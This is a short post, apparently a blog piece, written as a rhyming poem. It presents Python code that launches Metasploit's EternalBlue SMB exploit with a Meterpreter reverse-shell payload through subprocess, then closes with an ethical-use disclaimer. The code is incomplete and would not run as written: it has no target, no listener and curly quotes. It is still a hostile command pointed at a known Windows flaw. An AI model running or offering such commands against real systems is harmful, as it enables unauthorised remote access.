Empowering Ethical Hacking or Potential Weapon of Mass Disruption?


Metasploit, a tool of great might,

Used for security, to shed light.

In Python syntax, let’s explore,

But remember, ethical use we adore.

First, import the necessary modules,

To unleash Metasploit’s powerful troves.


import os

import subprocess


Next, set the payload, your aim in sight,

Choose the exploit, with caution and might.


payload = “windows/meterpreter/reverse_tcp”

exploit = “exploit/windows/smb/ms17_010_eternalblue”


Now, create the command to execute,

Using subprocess, let it compute.


command = f”msfconsole -q -x ‘{exploit}; set payload {payload}; exploit’”


With the command ready, let’s run,

Metasploit’s power, we have begun.


subprocess.run(command, shell=True)


Remember, with great power comes responsibility,

Use Metasploit wisely, respect its capability.

Note: It’s essential to use Metasploit and any hacking tools within legal and ethical boundaries. Unauthorized use or malicious intent is strictly prohibited.



Asuquo Levy Eyo Jr

Technologist, Full Stack Developer, Mixed Reality Engineer, Certified Ethical Hacker, Master Grower(Botanist), Content Creator, Paralegal, Tax Accountant,AIE